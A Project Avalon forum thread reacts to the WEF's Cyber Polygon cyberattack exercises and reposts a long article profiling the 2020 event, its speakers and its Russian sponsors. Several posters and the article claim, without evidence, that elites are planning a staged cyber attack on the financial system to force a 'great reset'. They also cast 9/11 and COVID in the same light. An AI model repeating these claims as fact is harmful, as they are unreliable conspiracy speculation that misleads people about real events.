    The scenario assumed that the participants would be able to defend themselves without having to patch the code in their game services. For example, to protect against the third vulnerability — security misconfiguration, which is associated with an insecure Docker configuration, it was sufficient to block the database port on the firewall.

    However, we believe that the best solution is to remediate the flaws in services and applications rather than resorting to ’palliative’ measures, which sooner or later may not be sufficient to withstand an attack. This is why we examined in detail the source code corrections as a means to protect against vulnerabilities.

    We hope that you have found the exercise useful and insightful, and look forward to seeing you at the next Cyber Polygon events.
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  4. The Following 16 Users Say Thank You to Tintin For This Post:

    Alecs (6th May 2021), Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (8th April 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), pabranno (8th June 2021), palehorse (8th April 2021), Reinhard (8th May 2021), Sérénité (6th May 2021), Snoweagle (8th April 2021), TomKat (8th April 2021), toppy (8th April 2021), Yoda (8th April 2021)

  5. Link to Post #3
    Avalon Member palehorse's Avatar
    Join Date
    13th April 2020
    Location
    Gaia
    Language
    English
    Age
    46
    Posts
    1,626
    Thanks
    12,030
    Thanked 11,373 times in 1,568 posts

    Default Re: WEF planning cyber attack on financial system?

    Well.. I am wondering why they are talking about this again!?! It is not new news, that the financial system is weak and may collapse, to be frank I am hearing this thing since 2011 or even before that, in many occasions when I was connected on IRC servers, there was anonops channels available elsewhere, with many operations daily, things going from DDOS to large corporations to small ones hitting servers like KKK, Al-Qaeda, pedo's websites like Clinton family, non-profit organizations, universities.. and didn't stop there, database hacking was the most requested (and still) using tools like `sqlmap` and `havij` and browser exploitation tools like `beef` also vulns checks and hacking tools from the amazing `rapid7`, I worked as programmer and many times close to the penetration test guy (yeah I know weirdo name), specially when the company didn't want to pay an extra worker (it was part of my job to watch vulnerabilities and patch it), then I had to learn about these stuffs to know what the possible treat could be and be ready to mitigate problems if they arise, I got quite acquainted with many of these tools and I can assure you a 100% maybe 200%, almost the entire web is vulnerable (it is a freak show, everything is tested innumerous time), there is so many flaws or call it bugs that the majority are not even documented (some very famous Linux libraries has some major flaws that was never really addressed well, there is band-aids sort of thing) and there is no tools to test them (it is a live thing expanding quickly, very dynamic), what you find in xploits-db websites or CVE is just the tip of the iceberg, most real hackers will never disclosure a breach to such systems, they will exploit the breach as much as they can, in other words, they will milk the cow, leave the dead beef behind and go for the next target, many times the "security experts" can't detect all the "daemons" in their system, some are very hard to detect and they are stealth, one need really to watch close to find inconsistencies in the files. Remember stuxnet? The mainstream today call it "Computer program", truth is: it was a hell of hack, they just have to admit it.

    Most hacks are related to confidential data and if the hacker doesn't warn the company (make a joke of it, some love audience), the exploit can remain in place for a long time until someone find, some of these things are really undetectable. Remember you can't test a vulnerability against something that is not yet available, by the way that's how anti-virus/malware companies make their bucks.
    A very skilled hacker is also a master of patience, some hacking take years of planing, testing and execution, in the other hand some hacking are quickly done with an insider, I would not call it hacking, but the media does.

    Now backing to the banks, have heard of the "Beirut Bank Job"? Bangladeshi Central Bank hack? SWIFT security breaches? Sonali Bank heist in 2013? In Bangladeshi for example the hackers walked away with more than 80 million dollars, the target was 1 billion, but they failed and the FED and CBIAS which are the same **** took the blame (they are supposed to protect the smaller economies, which by the way blindly trust them). All these cases followed investigation and they found out that bank employees was probably acting as an accomplice, they also have high suspicious in the government of North Korea (Lazarus Group or BeagleBoyz, the FBI claimed to have a name of a North Korean man responsible and he was charged, but never arrested, also their claims has no name, which is very strange) and a ****ing Casino in China owned by a Chinese-Filipino, a few bank employees were arrested but there is no solid case and the money was never recovered. In total were more than 10 bank heists (hacking since 2013), the companies investigating say almost all has the same patterns of attack.

    quote from the article “Not a Question of If but When“, it says everything.

    A little bit off-topic but may interest someone
    This US show was made in 2015 and the entire hacking stuffs was researched with real hackers (some anonymous) and based on the ongoing world hacking events of earlier time, because they want the most accurate picture of what a hacker world really means, here Mr. Robot bring down the entire economic system with the help of his crew and people.. (the 1% of 1% that like to play God).

    The Plot
    "Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for."

    If anyone have the time to watch, it is very informative. https://www.imdb.com/title/tt4158110/?ref_=fn_al_tt_1 (it is available in torrents everywhere).

    Also I would like to recommend these podcasts, very informative with people actively working in this industry >>> https://darknetdiaries.com/

    I would not be surprised if the entire thing is staged, and when the next one occur it will render the entire financial system obsolete, because in fact that's what they want, a great reset.
    Last edited by palehorse; 8th April 2021 at 13:50. Reason: added podcast recommendation
    --
    A chaos to the sense, a Kosmos to the reason.

  6. The Following 10 Users Say Thank You to palehorse For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), O Donna (10th April 2021), Reinhard (8th May 2021), Tintin (8th June 2021), TomKat (8th April 2021), toppy (8th April 2021)

  7. Link to Post #4
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.

  8. The Following 13 Users Say Thank You to TomKat For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), lizhekb (11th July 2021), Mashika (10th July 2021), O Donna (10th April 2021), palehorse (8th April 2021), Peace in Oz (11th April 2021), Sue (Ayt) (10th July 2021), Tintin (8th June 2021), toppy (8th April 2021)

  9. Link to Post #5
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    473
    Thanks
    342
    Thanked 2,518 times in 441 posts

    Default Re: WEF planning cyber attack on financial system?

    Very interesting post. Thanks TomKat! Will look at this more closely when I have some time.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  10. The Following 3 Users Say Thank You to Andre For This Post:

    Bill Ryan (11th April 2021), Harmony (16th July 2021), Tintin (8th June 2021)

  11. Link to Post #6
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Project Avalon library
    Language
    English
    Age
    54
    Posts
    5,420
    Thanks
    64,185
    Thanked 46,345 times in 5,388 posts

    Default Re: WEF planning cyber attack on financial system?

    Israel appears to confirm it carried out cyberattack on Iran nuclear facility

    Is this a part of the exercise I wonder
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  12. The Following 7 Users Say Thank You to Tintin For This Post:

    Bill Ryan (11th April 2021), gord (11th April 2021), Gwin Ru (10th July 2021), Harmony (16th July 2021), palehorse (12th April 2021), Snoweagle (7th May 2021), Sunny (14th April 2021)

  13. Link to Post #7
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.

  14. The Following 6 Users Say Thank You to TomKat For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), palehorse (13th April 2021), Peace in Oz (13th April 2021), Sérénité (6th May 2021), Tintin (8th June 2021)

  15. Link to Post #8
    UK Avalon Member Sérénité's Avatar
    Join Date
    12th March 2013
    Language
    English
    Posts
    894
    Thanks
    3,644
    Thanked 9,055 times in 868 posts

    Default Re: WEF planning cyber attack on financial system?

    https://sociable.co/technology/prepp...jk_FBfuBBXjF7s

    Prepping for a cyber pandemic: Cyber Polygon 2021 to stage supply chain attack simulation

    The World Economic Forum (WEF) will stage another cyber attack exercise as it continues to prep for a potential cyber pandemic that founder Klaus Schwab says will be worse than the current global crisis.

    The SolarWinds hack served as a wake-up call to the supply chain attack vulnerabilities still present in public and private organizations, and it served as a warning that the next breach could be exponentially worse in spreading through any device connected to the internet.

    Following up on last year’s Cyber Polygon cyber attack exercise and event aimed at preventing a digital pandemic, the WEF has announced that the 2021 edition will be taking place on July 9.

    This year, Cyber Polygon 2021 will simulate a fictional cyber attack with participants from dozens of countries responding to “a targeted supply chain attack on a corporate ecosystem in real time.”

    When Klaus Shwab is involved in anything to do with supply chain issue simulations, you know it’s time to stock up on extra rice!

  16. The Following 8 Users Say Thank You to Sérénité For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), palehorse (7th May 2021), Peace in Oz (6th May 2021), Reinhard (8th May 2021), Sunny (7th May 2021), Tintin (8th June 2021), TomKat (6th May 2021)

  17. Link to Post #9
    United States On Sabbatical
    Join Date
    30th June 2011
    Location
    The Seat of Corruption
    Age
    44
    Posts
    9,177
    Thanks
    25,610
    Thanked 53,656 times in 8,694 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by TomKat (here)
    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.
    in reality it will be Citadel, Vanguard, BLackrock and others fighting eachother due to horribel policy and rampant greed, this will happen very soon & scape goats (besides retail investors) will be needed...

    this seems very like the "russians hacked everything" narrative that went on for the last 5years or so.

    Quote Posted by TomKat (here)
    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.
    Or to stop the biggest transfer of wealth the world has ever seen (from the rich to the poor this time though.... and to other rich's)
    Last edited by TargeT; 6th May 2021 at 21:11.
    Hard times create strong men, Strong men create good times, Good times create weak men, Weak men create hard times.
    Where are you?

  18. The Following 11 Users Say Thank You to TargeT For This Post:

    Bill Ryan (10th July 2021), gord (8th May 2021), Gwin Ru (10th July 2021), Mypos (6th May 2021), palehorse (7th May 2021), Peace in Oz (6th May 2021), Reinhard (8th May 2021), Snoweagle (7th May 2021), Sunny (7th May 2021), Tintin (8th June 2021), TomKat (6th May 2021)

  19. Link to Post #10
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default Re: WEF planning cyber attack on financial system?

    Maybe the first round of cyber attacks promised by the WEF. Brought down a pipeline feeding the US east coast:

    https://www.msn.com/en-us/news/polit...st/ar-BB1gvwaD

  20. The Following 5 Users Say Thank You to TomKat For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), mountain_jim (8th June 2021), Sérénité (9th May 2021), Tintin (8th June 2021)

  21. Link to Post #11
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Peter Orphanides on Fb, (quote):

    "Most people remember the expression: "He who smelt it, dealt it", right? Well, when it comes to the powers that be predicting something bad happening, that's the best rule to operate under.

    The event is scheduled for July, and involves a simulated attack on the financial services and supply sector: This would produce catastrophic results that likely would make the issues that's occurred over the last year seem trivial.

    It would also allow the elites to consolidate their power as they could buy everything up for pennies on the dollar, and use that to exert more of a squeeze on the system: Further, it's easier to rebuild a new system after demolishing the old, rather than modifying the existing system.

    Generally, the only hope of preventing a scenario like this from being implemented is to share the message to as many people as possible, while encouraging them to do the same.

    The faster we react, the better (and the pipeline hack seems to be indicative of a test-run for what they seen to carry out later on) so there's no time like the present.
    Further: Being that this is a global issue, it'd be nice if some protests could be set into motion in places where the WEF has offices (their headquarters are in Cologny, Switzerland)".
    (unquote).
    • From “Event 201” to “Cyber Polygon”: The WEF’s Simulation of a Coming “Cyber Pandemic”
    Last year, the World Economic Forum teamed up with the Russian government and global banks to run a high-profile cyberattack simulation that targeted the financial industry, an actual event that would pave the way for a “reset” of the global economy. The simulation, named Cyber Polygon, may have been more than a typical planning exercise and bears similarities to the WEF-sponsored pandemic simulation Event 201 that briefly preceded the COVID-19 crisis.



    On Wednesday, the World Economic Forum (WEF), along with Russia’s Sberbank and its cybersecurity subsidiary BI.ZONE announced that a new global cyberattack simulation would take place this coming July to instruct participants in “developing secure ecosystems” by simulating a supply-chain cyberattack similar to the recent SolarWinds hack that would “assess the cyber resilience” of the exercise’s participants.

    On the newly updated event website, the simulation, called Cyber Polygon 2021, ominously warns that, given the digitalization trends largely spurred by the COVID-19 crisis, “a single vulnerable link is enough to bring down the entire system, just like the domino effect,” adding that “a secure approach to digital development today will determine the future of humanity for decades to come.”

    The exercise comes several months after the WEF, the “international organization for public-private cooperation” that counts the world’s richest elite among its members, formally announced its movement for a Great Reset, which would involve the coordinated transition to a Fourth Industrial Revolution global economy in which human workers become increasingly irrelevant. This revolution, including its biggest proponent, WEF founder Klaus Schwab, has previously presented a major problem for WEF members and member organizations in terms of what will happen to the masses of people left unemployed by the increasing automation and digitalization in the workplace.

    New economic systems that are digitally based and either partnered with or run by central banks are a key part of the WEF’s Great Reset, and such systems would be part of the answer to controlling the masses of the recently unemployed. As others have noted, these digital monopolies, not just financial services, would allow those who control them to “turn off” a person’s money and access to services if that individual does not comply with certain laws, mandates and regulations.

    The WEF has been actively promoting and creating such systems and has most recently taken to calling its preferred model “stakeholder capitalism.” Though advertised as a more “inclusive” form of capitalism, stakeholder capitalism would essentially fuse the public and private sectors, creating a system much more like Mussolini’s corporatist style of fascism than anything else.

    Yet, to usher in this new and radically different system, the current corrupt system must somehow collapse in its entirety, and its replacement must be successfully marketed to the masses as somehow better than its predecessor. When the world’s most powerful people, such as members of the WEF, desire to make radical changes, crises conveniently emerge—whether a war, a plague, or economic collapse—that enable a “reset” of the system, which is frequently accompanied by a massive upward transfer of wealth.

    In recent decades, such events have often been preceded by simulations that come thick and fast before the very event they were meant to “prevent” takes place. Recent examples include the 2020 US election and COVID-19. One of these, Event 201, was cohosted by the World Economic Forum in October 2019 and simulated a novel coronavirus pandemic that spreads around the world and causes major disruptions to the global economy—just a few weeks before the first case of COVID-19 appeared. Cyber Polygon 2021 is merely the latest such simulation, cosponsored by the World Economic Forum. The forum’s current agenda and its past track record of hosting prophetic simulations demands that the exercise be scrutinized.

    Though Cyber Polygon 2021 is months off, it was preceded by Cyber Polygon 2020, a similar WEF-sponsored simulation that took place last July in which speakers warned of a coming deadly “pandemic” of cyberattacks that would largely target two economic sectors, healthcare and finance. Cyber Polygon 2020 was officially described as “international online training for raising global cyber resilience” and involved many of the world’s biggest tech companies and international authorities, from IBM to INTERPOL. There were also many surprising participants at the event, some of whom have been traditionally seen as opposed to Western imperial interests. For example, the person chosen to open the Cyber Polygon event was the prime minister of the Russian Federation, Mikhail Mishustin, and its main host, BI.ZONE, was a subsidiary of the Russian-government-controlled Sberbank. This suggests that the overused “Russian hacker” narrative may be coming to an end or will soon be switched out for another boogeyman more suitable in light of current political realities.

    Aside from Mishustin, WEF executive director Klaus Schwab and former UK prime minister Tony Blair participated in the Cyber Polygon 2020 event, which is due to be repeated annually and bears many similarities to 2019’s Event 201. Rather than preparing for a potential medical pandemic, Cyber Polygon 2020 focused on preparing for a “cyberpandemic,” one that mainstream media outlets like the New Yorker claim is “already underway.” Given the WEF’s recent simulations, powerful billionaire business owners and bankers appear to be poised to use both physical and digital pandemics to reform our societies according to their own design and for their own benefit.
    • The Architects of Cyber Polygon
    According to Russian cybersecurity firm BI.ZONE, 120 organizations spread over twenty-nine countries took part in the two scenarios that were simulated at Cyber Polygon 2020, with as many as five million people allegedly having watched the livestream in over fifty-seven countries. Like many events that took place in 2020, the Cyber Polygon simulations were conducted online due to COVID-19 restrictions. Together with the World Economic Forum, BI.ZONE, a subsidiary of Sberbank, manages the Cyber Polygon project. Sberbank’s largest shareholder, as of last year, is the Russian government, and it is thus often described by English-language media outlets as a state-controlled bank.

    The 2020 event was launched with an address from the prime minister of the Russian Federation Mishustin, who has a history of courting Western tech companies prior to entering politics. In 1989, Mishustin graduated from Moscow State Technological University (generally known as Stankin) with a qualification in systems engineering. During the 1990s, he worked at the International Computer Club, a nonprofit organization with the goal of “attracting Western advanced information technologies” to Russia. Between 1996 and 1998, Mishustin was the chairman of the board of the ICC, but the company was liquidated in 2016. Between 2010 and 2020, he served as head of the Federal Taxation Service of the Russian Federation. Even though he had never shown any previous political ambitions, on January 16, 2020, he was appointed prime minister of the Russian Federation by an executive order issued by President Putin.

    During Mishustin’s welcoming remarks at the WEF’s Cyber Polygon 2020, the Russian PM warned of the need to create public policy to “strengthen the digital security of critical activities without undermining the benefits from digital transformation in critical sectors that would unnecessarily restrict the use and openness of digital technology.” The statement suggests that “unnecessary restrictions” could become seen as necessary in time.

    Mishustin goes on to explain that Russia’s post-COVID economic recovery will be based on the “increasing digitalization of that economy and government,” adding that “we will drastically increase the number of available digital public services and introduce fundamentally new support measures for digital businesses.” He also stated that “Russia has developed a common national system for identification and the prevention of cyberattacks with the government agency’s information systems linked in the system.” He also addressed the Cyber Polygon audience about the international community needing to come together to prevent a “global cyberfraud pandemic.”

    Sberbank, the largest Russian banking institution and former Soviet savings monopoly, which was originally founded by Nicholas I, was an official host of the Cyber Polygon 2020 event alongside the World Economic Forum. As reported in the Economist in January 2021, the Russian banking giant has begun to reimagine its business in an effort to become a consumer-technology giant. Sberbank has spent around $2 billion on technology and acquisitions, including the acquisition of internet media group Rambler, which it fully acquired in 2020. As late as December 30, 2020, Sberbank acquired Doma.ai, which describes itself as “a convenient real estate management platform.” On June 15, 2020, Sberbank bought 2GIS, a map, navigator, and business directory with over 42 million monthly active users. Sberbank’s twenty-two investments, eleven as the lead investor, include some of the most used services in Russia, and its clear intention is to become a one-stop digital shop for all services. The bank also became the owner of one of the largest data-processing centers in Europe when the South Port data-processing center opened in November 2011, replacing the existing thirty-six regional data centers. Sberbank is set to be the world’s first bank to launch its own cryptocurrency, Sbercoin, and digital finance “ecosystem” this March. It notably announced the coming Sbercoin, a “stablecoin” tied to the Russian ruble, just a few weeks after the Cyber Polygon 2020 exercise.

    Sberbank’s alliance with the WEF and prominence at Cyber Polygon 2020 was underscored at the event during the welcoming remarks delivered by Klaus Schwab. Schwab gave special thanks to Herman Gref, a member of the board of trustees of the World Economic Forum and Sberbank’s CEO and also issued the following dire warning:
    We all know, but still pay insufficient attention to, the frightening scenario of a comprehensive cyberattack which would bring to a complete halt to the power supply, transportation, hospital services, our society as a whole. The COVID-19 crisis would be seen in this respect as a small disturbance in comparison to a major cyberattack. We have to ask ourselves, in such a situation, how could we let this happen despite the fact we had all the information about the possibility and seriousness of a risk attack. Cybercrime and global cooperation should be on the forefront of the global agenda.
    Similar warnings were heard at a 2019 simulation that was also cosponsored by the World Economic Forum, Event 201. Event 201, which simulated a global pandemic just months before the COVID-19 crisis, presciently warned in its official documentation: “The next severe pandemic will not only cause great illness and loss of life but could also trigger major cascading economic and societal consequences that could contribute greatly to global impact and suffering.” In contrast to similar simulations conducted in the past, Event 201 championed a “public-private partnership” approach to combatting pandemics, with a focus on engaging “the private sector in epidemic and outbreak preparedness at the national or regional level.” The WEF is, among other things, a major evangelist for the merging of the public and private sectors globally, describing itself as the “international organization for private-public cooperation.” It is thus unsurprising that their latest disaster simulation, which focuses on cyberattacks, would promote this same agenda.
    • The Speakers at Cyber Polygon 2020
    Aside from Schwab and Mishustin, twenty others took part in Cyber Polygon 2020, including some big names from the top echelons of the political elite. First off, Herman Gref engaged in discussion with former UK prime minister Tony Blair, who has been pushing for digital identity systems for decades. Blair straightforwardly told the CEO of Sberbank that biometric digital identity systems will “inevitably” be the tools that most governments will use to deal with future pandemics. Blair, discussing the coronavirus pandemic with Gref, advocated the harshest of lockdown measures, saying the only alternative to biometric digital identities is to “lockdown the economy.”

    Next, Sebastian Tolstoy, Ericsson’s general director for Eastern Europe, Central Asia, and Russia and current chairman of the Tolstoy Family Foundation in Sweden, dialogued with Alexey Kornya. Kornya is president, CEO, and chairman of the management board of Mobile TeleSystems. He previously worked for PricewaterhouseCoopers and AIG-Brunswick Capital Management at North-West Telecom. Tolstoy and Kornya presented a segment at Cyber Polygon 2020 entitled “Building a Secure Interconnected World: What Is the Role of the Telecom Sector?” in which they discussed the importance of digital communication and connectivity to our modern way of living.

    In the next segment, Nik Gowing, BBC World News presenter between 1996 and 2014 and founder and director of Thinking the Unthinkable, spoke with Vladimir Pozner, journalist and broadcaster, on the subject of “fake news” in a conversation that was actually somewhat refreshing in its arguments and approach.

    Stéphane Duguin, the CEO of the CyberPeace Institute, a Geneva-based company that describes itself as “citizens who seek peace and justice in cyberspace,” then gave a talk to the millions of viewers watching the simulation. The CyberPeace Institute, funded by Microsoft, Facebook, Mastercard, and the Hewlett Foundation, among others, claims to help their customers “increase digital resilience and the capacity to respond to and recover from cyberattacks.” The core backers of the CyberPeace Institute are also among the top backers of the Global Cyber Alliance, which unites the public sectors of the US, UK, and France with multinational corporations and intelligence-linked cybersecurity firms, employing “a coordinated approach and nontraditional collaboration” to “reduce cyber risk.”



    Duguin, who is also on the advisory board of the Global Forum on Cyber Expertise, recently launched the Cyber4Healthcare initiative, a “free” cybersecurity service to healthcare providers fighting the COVID-19 pandemic. The Cyber4Healthcare initiative includes as its main partners BI.ZONE as well as Microsoft and the Global Cyber Alliance. This is yet another suspicious Microsoft-linked free cybersecurity service currently being pitched to and adopted by healthcare providers around the world at a time when warnings of a coming cyberattack on healthcare systems globally are becoming more public.

    Dhanya Thakkar, senior vice president of AMEA at Trend Micro, who advertises himself online as a top ASEAN LinkedIn “cybersecurity influencer,” and Wendi Whitmore, vice president of IBM X-Force Threat Intelligence, next discussed the topic “Know Your Enemy: How Is the Crisis Changing the Cyberthreat Landscape?” IBM’s presence is notable due to the company’s longstanding relationship with the CIA, dating back to the early Cold War. The company has become so entrenched that the CIA recently recruited their chief information officer directly from IBM Federal. Before joining IBM, Whitmore held executive positions at California-based cybersecurity technology companies CrowdStrike and Mandiant, the latter acquired by FireEye in a stock and cash deal worth in excess of $1 billion. Whitmore was responsible for “professional services.” Notably, both CrowdStrike and Mandiant/FireEye are the key organizations leading the investigation into the recent SolarWinds hack, which US intelligence has blamed on a “Russian hacker” without providing any evidence. Whitmore began her career as a special agent conducting computer crime investigations with the Air Force Office of Special Investigations.

    Jacqueline Kernot, the Australian “partner in cybersecurity” for Ernst and Young, and Hector Rodriguez, senior vice president and regional risk officer for Visa, next discussed how to prepare for cyberattacks. Kernot worked for over twenty-five years as a military officer for the Australian Intelligence Corps and spent two years working at IBM’s Defence|Space|Intelligence for Tivoli Software in the UK with “international responsibilities within the UK Ministry of Defence, Defence Primes, and NATO.” Ernst and Young and Visa, alongside other WEF-linked corporations such as Salesforce, are well represented on the Vatican’s exclusive Council for Inclusive Capitalism. The Council, like the WEF, calls for the reconstruction of the economic system to be more “sustainable,” “inclusive,” and “dynamic” by “harnessing the power of the private sector.”

    Troels Ørting Jørgensen , chairman of the advisory board of the World Economic Forum’s Centre for Cybersecurity, and Jürgen Stock, the Danish secretary general of INTERPOL, also spoke together at Cyber Polygon regarding the changes in global cybercrime over the course of the previous year. A few months after appearing at Cyber Polygon, the Danish Financial Supervisory Authority announced in an official statement that “Troels Ørting has notified the Ministry of Business Affairs that he is resigning from the Danish Financial Supervisory Authority’s board.” Citing unnamed sources, Danish financial news service FinansWatch reported that during the time between 2015 and 2018, when he was employed as head of security at Barclays bank, Ørting had been a key figure in the hunt for a whistleblower who had exposed the same criminal activity Ørting railed against at Cyber Polygon.



    The man speaking alongside Ørting, Jürgen Stock, is a former German police officer, criminologist, and lawyer. He was elected for a second term as secretary general of INTERPOL in 2019, a term that generally lasts for five years. Craig Jones, the cybercrime director at INTERPOL, also joined the discussion at Cyber Polygon 2020. The New Zealander spent twenty-seven years in law enforcement and is considered an expert in cybercrime investigations. He previously held several senior-management positions in UK law enforcement, most recently at the National Crime Agency.
    Petr Gorodov and John Crain were briefly interviewed at the Cyber Polygon 2020 event. Gorodov is head of the General Directorate for International Relations and Legal Assistance of the Prosecutor General’s Office of the Russian Federation and also sits on the Commission for the Control of INTERPOL’s files. He is on the Requests Chamber of INTERPOL, which examines and decides on requests for access to data as well as requests for correction and/or deletion of data processed in the INTERPOL information system. John Crain is chief security, stability, and resiliency officer at ICANN, the nonprofit internet security corporation. He is currently responsible for the management of the L-Root server, one of the internet’s thirteen root servers, making his inclusion at the simulation particularly notable. At Cyber Polygon 2020 he promoted a “long-term solution of working together in the cybersecurity community.”

    The final word at Cyber Polygon 2020 was delivered by Stanislav Kuznetsov, deputy chairman of the executive board at Sberbank. He is also a board member for the Sberbank charity foundation Contribution to the Future, a project that seeks to get Russian schoolchildren from grades seven through eleven interested in AI (artificial intelligence), machine learning, and data analysis and to help them develop math and programming skills. Kuznetsov studied at the Law Institute of the Ministry of Internal Affairs of the Russian Federation.
    • The Main Event: Enter the Polygon


    Participants in the Cyber Polygon 2020 event, Source: cyberpolygon.com

    The simulation component of Cyber Polygon 2020 saw 120 teams from twenty-nine countries take part in the cybersecurity technical simulation. During the online event, participants “exercise[d] the actions of the response team in a targeted attack aimed at stealing confidential data and thus resulting in damage to the company reputation.” Two teams, the Red and the Blue, went head-to-head in the simulations where the Red Team, made up of the training organizers from BI.ZONE, simulated cyberattacks and the Blue Team members attempted to protect their segments of the training infrastructure. The actual simulation was made up of two scenarios in which the various subgroups making up the teams could gain points.

    The first scenario, called Defence, made the Cyber Polygon participants practice repelling an active APT (advanced persistent threat) cyberattack. The scenario’s objective was stated as being to “develop skills for repelling targeted cyberattacks on a business-critical system.” The simulation’s fictional organization’s virtual infrastructure included a service that processes confidential client information. This service became the subject of interest to an APT group that planned to steal confidential user data and resell it on the “darknet” to financially benefit and damage the company’s reputation. The APT group studied the target system in advance and discovered several critical vulnerabilities. In the scenario, the cyber “gang” plans to attack on the day of the exercise. The participants involved were judged on their ability to cope with the attack as fast as possible, to minimize the amount of information stolen, and to maintain service availability. Blue Team participants could apply any applications and tools to protect the infrastructure and were also allowed to fix system vulnerabilities by improving the service code.

    In the second scenario, called Response, the teams had to investigate the incident using “classic forensics and threat hunting techniques.” Based on the information gathered, participants had to compose a dossier that would help law enforcement agencies locate the criminals. The second scenario’s objective was to develop skills in incident investigation using the scenario in which cybercriminals gained access to a privileged account through a successful phishing attack.

    When the BI.ZONE team released the results of the simulation they intentionally avoided using the real names of the organizations so as not to “set off a competition between the participants and keep their results confidential.” However, the teams could later compare their results with the others by using a basic scoreboard, and the hosts could analyse the crucial data showing various organizational weaknesses of each of the participating teams/institutions.

    The final report states that the results showed that “banks and companies from the IT industry demonstrated the highest resilience. Security assessment expertise in these sectors is quite well developed, with classic forensics and threat hunting widely applied.” In lay terms, the teams from banks and the IT industry seemed to be better prepared than most other sectors for investigating and hunting down threats. However, all the teams involved proved to be less than able when it came to the initial defense from a cyberattack, with the BI.ZONE report stating that “27% of the teams had difficulties earning points for the first scenario, which allows us to conclude that some of the team members lack or have insufficient expertise in security assessment and protection of web applications.” On the subject of threat hunting, the report goes on to say that “21% of the teams could not earn a single point for the second round of the second scenario. This was attributed to ‘Threat Hunting’ being a relatively novel approach and the majority of organisations lacking experience of applying its techniques in practice.”

    The Cyber Polygon 2020 event revealed the weakness in human-led defensive response and resilience as it relates cyberdefense. This outcome is convenient for hi-tech cybersecurity companies like BI.ZONE that wish to highlight the superiority of AI-driven cybersecurity products in comparison to “inefficient” human workers. Also, it should be noted that BI.ZONE’s gaining knowledge of global institutional weaknesses through cyberdefense training could be useful intelligence for their parent company, Sberbank, and in turn the largest shareholder of Sberbank, the Russian government.
    • Bringing Russia in from the Cold?
    Although Russian Federation authorities are quite used to being out in the cold both politically and physically, there appears to be a change in the usual order of nations. Russia’s inclusion as the leader in such an important global cybersecurity initiative is a bit surprising, especially after Russia has been the scapegoat of choice for any cyberattack committed against any Western power for several years, most recently with the SolarWinds hack in the US. Yet, there was no outcry in the West over Cyber Polygon 2020, in which a company that is majority owned by the Russian government was able to gain direct knowledge of the cyberdefense weaknesses of major global institutions, banks, and corporations through their hosting of the exercise.

    The complete absence of the “Russian hacker” narrative at Cyber Polygon as well as Russia’s leadership role at the event suggests either that a geopolitical shift has taken place or that the Russian hacker narrative commonly deployed by intelligence agencies in the US and Europe is mainly meant for the general public and not for the elite figures and policymakers in attendance at Cyber Polygon.

    Another possibility for Russia no longer being treated as the perpetual enemy of cyberspace is that it is entirely on board with both the official coronavirus narrative and the allegedly imminent cyberpandemic. Cyber Polygon 2020 appeared, in part, to be a Russian charm offensive that was welcomed by the powerful elite. Tony Blair, who once held out the hand of false reconciliation on behalf of the international community to Colonel Gaddafi, has often been involved in these exercises of international diplomacy on behalf of the elites in the years since he left public office. His involvement in the exercise may have been meant to facilitate support among Western WEF-aligned governments for even greater Russian inclusion in the Great Reset. Part of this is due to the WEF-led effort to bring BRICS nations like China and Russia into the Great Reset fold because it is essential for their agenda’s success on a global scale. Now, Russia is pioneering this new model of supposedly national finance systems that the WEF supports through Sberbank’s creation of a digital monopoly not only of financial services but all services within the Russian Federation.

